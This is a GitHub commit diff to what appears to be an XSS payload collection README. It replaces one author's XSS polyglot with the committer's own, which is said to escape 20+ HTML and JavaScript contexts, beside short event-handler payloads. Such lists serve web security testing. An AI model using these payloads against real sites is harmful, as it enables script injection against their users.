added XSS polyglot

This commit is contained in:
Somdev Sangwan 2018-10-31 23:29:26 +05:30 committed by GitHub
parent 5957e79092
commit 14d12fd201
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -52,9 +52,11 @@ Put this repo on watch. I will be updating it regularly.
<x oncut=alert()>x <x oncut=alert()>x
<svg onload=write()> <svg onload=write()>
``` ```
Here's an interesting XSS polyglot by [Ahmed Elsobky](https://github.com/0xsobky/): ### Awesome Polyglots
Here's an XSS polyglot that I made which can break out of 20+ contexts:
``` ```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e %0ajavascript:`/*\"/*-->&lt;svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">`
``` ```
### Awesome Tags & Event Handlers ### Awesome Tags & Event Handlers